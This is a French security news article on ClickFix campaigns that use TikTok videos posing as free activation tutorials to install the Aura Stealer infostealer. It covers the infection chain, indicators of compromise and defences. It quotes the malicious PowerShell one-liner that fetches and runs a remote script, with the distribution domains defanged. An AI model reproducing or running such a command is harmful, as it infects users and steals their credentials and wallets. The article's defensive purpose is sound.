TikTok : menace croissante des attaques ClickFix avec les infostealers

Apollinaire Monteclair

TikTok : nouvelle plateforme privilégiée pour les campagnes d’infostealing via les attaques ClickFix

En 2025, les cybercriminels ont trouvé un vecteur d’attaque particulièrement efficace : TikTok. Cette plateforme de partage vidéo, autrefois perçue comme relativement sûre, est aujourd’hui utilisée pour disséminer des logiciels malveillants spécialisés dans le vol d’informations sensibles. Les attaques ClickFix, qui consistent à inciter les utilisateurs à exécuter des commandes PowerShell sous prétexte d’offrir des solutions légitimes, ont trouvé un terrain de prédilection sur cette plateforme. Ces campagnes se déguisent en tutoriels d’activation gratuite pour des logiciels populaires tels que Windows, Spotify, ou encore Netflix, piègeant ainsi de nombreux utilisateurs qui cherchent simplement à contourner les paiements. Selon les spécialistes de la sécurité, cette méthode représente une menace croissante pour la protection des données personnelles et professionnelles.

Mécanismes des attaques ClickFix sur TikTok

Les attaques ClickFix observées sur TikTok suivent un schéma d’exploitation psychologique très sophistiqué. Les criminels créent des vidéos présentant des instructions pour activer gratuitement divers logiciels populaires. Le contenu est souvent accompagné d’une courte ligne de code présentée comme une solution miracle. Par exemple, la vidéo pourrait afficher une commande comme iex (irm slmgr[.]win/photoshop) et guider les spectateurs à l’exécuter en tant qu’administrateur dans PowerShell. La subtilité réside dans le fait que le nom du programme dans l’URL change en fonction du logiciel usurpé : pour une fausse activation Windows, l’URL contiendrait « windows » plutôt que « photoshop ».

Lorsque la victime exécute cette commande, PowerShell se connecte au site distant slmgr[.]win pour télécharger et exécuter un autre script PowerShell. Ce script, à son tour, télécharge deux exécutables depuis des pages Cloudflare. Le premier, nommé updater.exe, est une variante du Aura Stealer, un infostealer particulièrement dangereux. Ce malware collecte un ensemble impressionnant d’informations sensibles :

  • Identifiants sauvegardés dans les navigateurs web
  • Cookies d’authentification
  • Portefeuilles de cryptomonnaie
  • Informations d’identification d’autres applications

Un deuxième exécutable, source.exe, est ensuite téléchargé. Ce composant utilise le compilateur Visual C# intégré à .NET (csc.exe) pour compiler du code directement en mémoire. La fonction exacte de ce deuxième payload reste floue pour les chercheurs en sécurité, mais sa présence indique une complexité croissante dans les techniques d’injection et d’exécution des malwares.

Aura Stealer : le cœur des menaces disséminées via TikTok

L’Aura Stealer représente la principale menace émergente dans ces campagnes TikTok. Ce malware d’information-stealing est conçu pour maximiser le vol de données sensibles avec un minimum d’intervention de l’attaquant. Une fois installé sur un système infecté, il déploie une série de modules de collecte très efficaces :

  1. Module de vol de mots de passe : Scanne tous les navigateurs web installés pour extraire les identifiants sauvegardés, les mots de passe automatiquement remplis et les informations de connexion.

  2. Module de vol de cookies : Récupère les cookies d’authentification persistants, permettant aux attaquants de se connecter aux comptes de la victime sans connaître les mots de passe.

  3. Module de détection de portefeuilles cryptomonnaie : Identifie automatiquement les applications et extensions de portefeuilles de cryptomonnaie comme MetaMask, Trust Wallet ou Coinbase Wallet pour voler les clés privées et les fonds.

  4. Module d’analyse des applications : Recherche les informations d’identification stockées dans d’autres applications populaires (clients de messagerie, bureaux virtuels, outils de productivité, etc.).

L’efficacité de l’Aura Stealer réside dans sa capacité à s’adapter aux environnements Windows et à contourner les solutions de sécurité traditionnelles. Les chercheurs ont observé que cette famille de malware évolue rapidement, avec de nouvelles variantes apparaissant régulièrement pour échapper aux analyses antivirus et aux détections basées sur les signatures.

Évolution des campagnes : de mai 2025 à octobre 2025

Les attaques ClickFix via TikTok ne sont pas un phénomène émergent mais plutôt une évolution d’une campagne identifiée dès mai 2025 par Trend Micro. Plusieurs mois plus tard, les chercheurs ont constaté que ces campagnes non seulement persistent mais se sont également raffinées et étendues à une plus grande variété de logiciels usurpés.

À leurs débuts, ces attaques se concentraient principalement sur l’usurpation d’éditeurs logiciels populaires comme Microsoft et Adobe. Aujourd’hui, les cybercriminels ont élargi leur champ d’action pour inclure des services de streaming comme Netflix et Spotify, qui sont souvent ciblés car ils représentent des abonnements réguliers que les utilisateurs aimeraient potentiellement éviter de payer.

Une autre évolution significative est l’augmentation de la sophistication technique des payloads. Les premières variantes se contentaient de télécharger un seul exécutable malveillant. Les campagnes récentes, comme celle observée en octobre 2025, utilisent désormais un système en deux étapes avec un deuxième payload dédié à l’injection en mémoire, rendant la détection plus difficile pour les solutions de sécurité traditionnelles.

Impact sur les victimes : conséquences immédiates et à long terme

Les conséquences d’une infection par ces infostealers sont graves et multiples. Pour les victimes, l’impact se manifeste à plusieurs niveaux :

Conséquences immédiates

  • Vol d’identifiants : Les comptes email, réseaux sociaux et services en ligne sont compromis, permettant aux attaquants d’accéder à des informations privées et professionnelles.

  • Vol de données financières : Les informations bancaires et les données de paiement sont exposées, conduisant potentiellement à des transactions non autorisées.

  • Perte d’accès aux services : Les victimes peuvent se voir refuser l’accès à leurs propres comptes suite au changement de mots de passe par les attaquants.

Conséquences à long terme

  • Vol d’identité : Avec un accès complet aux informations personnelles, les attaquants peuvent usurper l’identité de leurs victimes pour commettre des fraudes plus complexes.

  • Attaques secondaires : Une fois initialisée dans un système, l’infostealer peut servir de porte d’entrée pour d’autres types d’attaques comme le rançongiciel ou l’espionnage.

  • Dommage réputationnel : Pour les professionnels, la compromission de comptes professionnels peut nuire gravement à leur réputation professionnelle et celle de leur entreprise.

Dans la pratique, les victimes de ces attaques doivent considérer toutes leurs informations d’identification comme compromises et procéder immédiatement à une réinitialisation complète de leurs mots de passe sur tous les sites et services qu’ils utilisent. Cette mesure, bien que nécessaire, ne constitue qu’une première étape dans la gestion de la compromission.

Détection et analyse technique des menaces TikTok

La détection des attaques ClickFix via TikTok représente un défi particulier pour les équipes de sécurité en raison de leur nature sociale et de leur utilisation légitime d’outils système comme PowerShell. Les analystes en sécurité doivent adopter une approche multi-couches pour identifier et contrer ces menaces.

Indicateurs de compromission (IoC)

Les chercheurs en sécurité ont identifié plusieurs indicateurs clés permettant de détecter ces campagnes :

  • URL suspectes : Les domaines comme slmgr[.]win et file-epq[.]pages[.]dev sont utilisés comme points de distribution des payloads malveillants.

  • Commandes PowerShell suspectes : Les commençant par iex (irm et se terminant par des extensions comme .win/photoshop).

  • Fichiers suspects : Les exécutables updater.exe et source.exe, détectables via leurs signatures hash (MD5, SHA1, SHA256).

Techniques d’analyse

Pour analyser ces menaces efficacement, les spécialistes recommandent :

  1. Analyse comportementale : Observer les activités suspectes comme l’exécution de scripts PowerShell depuis des sources non approuvées ou les connexions inattendues vers des domaines suspects.

  2. Analyse mémoire : Utiliser des outils spécialisés pour détecter les payloads injectés en mémoire, comme source.exe dans ces campagnes.

  3. Analyze réseau : Surveiller le trafic sortant anormal vers des domaines connus pour héberger du contenu malveillant.

La détection de ces attaques nécessite une compréhension approfondie du comportement légitime de PowerShell et des scripts, afin de distinguer les commandes légitimes des commandes malveillantes qui usurpent leur apparence. Les solutions de sécurité modernes intègrent des capacités de détection des comportements anormaux plutôt que de se fier uniquement aux signatures.

Stratégies de défense contre les attaques ClickFix

Face à la prolifération des attaques ClickFix via TikTok et autres plateformes de médias sociaux, les organisations et les particuliers doivent mettre en place des stratégies de défense robustes. Ces stratégies doivent combiner des mesures techniques, organisationnelles et de sensibilisation.

Mesures techniques

  1. Contrôle d’exécution des commandes : Implementer des solutions de contrôle d’accès aux commandes PowerShell et autres outils système pour empêcher l’exécution de scripts non autorisés.

  2. Sandboxing : Utiliser des environnements isolés pour analyser les fichiers et liens suspects avant leur exécution dans l’environnement de production.

  3. Mise à jour régulière : Maintenir tous les systèmes et applications à jour pour réduire les surfaces d’attaque potentielles.

Mesures organisationnelles

  1. Politiques d’accès : Mettre en œuvre le principe du moindre privilège pour limiter l’impact potentiel d’une compromission.

  2. Segmentation réseau : Isoler les réseaux sensibles pour contenir la propagation d’une menace en cas d’infection.

  3. Plans de réponse : Développer et tester des plans de réponse aux incidents pour faire face efficacement aux infections par des infostealers.

Mesures de sensibilisation

  1. Formation régulière : Former les utilisateurs à reconnaître les tentatives d’hameçonnage et les tactiques de social engineering.

  2. Campagnes de communication : Informer les utilisateurs des risques associés à l’exécution de commandes provenant de sources non fiables, même sur des plateformes populaires.

  3. Simulations d’attaques : Organiser des campagnes de simulation d’attaques pour évaluer et améliorer la vigilance des utilisateurs.

En pratique, la défense contre ces menaces nécessite une approche proactive et continue. Selon une étude menée par Picus Security en 2025, 46% des environnements testés ont vu leurs mots de passe crackés, nearly doubling from 25% l’année précédente. Cette statistique souligne l’importance capitale d’une défense en profondeur contre les menaces d’infostealing.

Recommandations pour les utilisateurs finaux

En tant qu’utilisateur final, plusieurs mesures concrètes peuvent vous protéger contre les attaques ClickFix sur TikTok et autres plateformes :

  1. Ne jamais exécuter de commandes inconnues : Méfiez-vous particulièrement des commandes PowerShell, CMD ou autres invites de commande que vous êtes invité à copier-coller depuis des vidéos ou des sites web.

  2. Vérifier la source : Avant d’interagir avec un tutoriel, vérifiez la crédibilité de la source et lisez les commentaires pour identifier d’éventuels avertissements.

  3. Utiliser des solutions de sécurité : Installez et maintenez à jour une solution antivirus ou EDR (Endpoint Detection and Response) capable de détecter les comportements malveillants.

  4. Adopter des bonnes pratiques de mot de passe : Utilisez des mots de passe uniques pour chaque service et envisagez l’adoption d’un gestionnaire de mots de passe.

  5. Activer l’authentification multifacteur (MFA) : Protégez vos comptes sensibles avec une couche de sécurité supplémentaire.

  6. Surveiller les comptes : Surveillez régulièrement l’activité suspecte sur vos comptes en ligne et signalez toute anomalie.

  7. Éduquez-vous continuellement : Les techniques d’attaque évoluent constamment. Restez informé des dernières menaces et méthodes de protection.

Tableau récapitulatif des types de logiciels usurpés

Type de logicielExemples concretsRisque associéRecommandation spécifique
Systèmes d’exploitationWindows, macOSÉlevé (accès système complet)Utilisez uniquement des sources officielles Microsoft ou Apple
Suites bureautiquesMicrosoft 365, Adobe Creative SuiteÉlevé (accès aux documents professionnels)Vérifiez les authenticity des licences avec les éditeurs
Outils de création vidéoCapCut Pro, Adobe PremiereMoyen (accès aux projets créatifs)Recherchez des alternatives open source légales
Services de streamingNetflix, Spotify PremiumFaible (accès aux contenus)Abonnez-vous via les canaux officiels pour éviter les restrictions
Plateformes de communicationDiscord NitroMoyen (accès aux communications privées)Utilisez la version gratuite ou payez directement via Discord

Conclusion et prochaines actions

Les attaques ClickFix via TikTok représentent une menace évolutive et particulièrement dangereuse pour la sécurité des données personnelles et professionnelles. En se dissimulant derrière des tutoriels d’activation logicielle apparemment inoffensifs, les cybercriminels exploitent à la fois la confiance des utilisateurs dans les plateformes populaires et leur désir d’économiser de l’argent. L’utilisation d’infostealers sophistiqués comme l’Aura Stealer rend ces attaques particulièrement virulentes, car elles permettent un vol à grande échelle d’informations sensibles avec un minimum d’intervention technique.

Face à cette menace croissante, une approche défensive multi-couches est essentielle, combinant des mesures techniques robustes, des politiques de sécurité organisationnelles strictes et une formation continue des utilisateurs. En tant qu’utilisateur, la vigilance reste votre meilleure arme : méfiez-vous des tutoriels demandant l’exécution de commandes, vérifiez toujours la crédibilité des sources et maintenez vos systèmes et applications à jour.

La protection contre les infostealers comme ceux distribués via TikTok nécessite une vigilance constante et une adaptation continue aux nouvelles techniques d’attaque. En adoptant les bonnes pratiques de sécurité et en restant informé des dernières menaces, vous pouvez significativement réduire vos risques de devenir la prochaine victime de ces campagnes d’infostealing.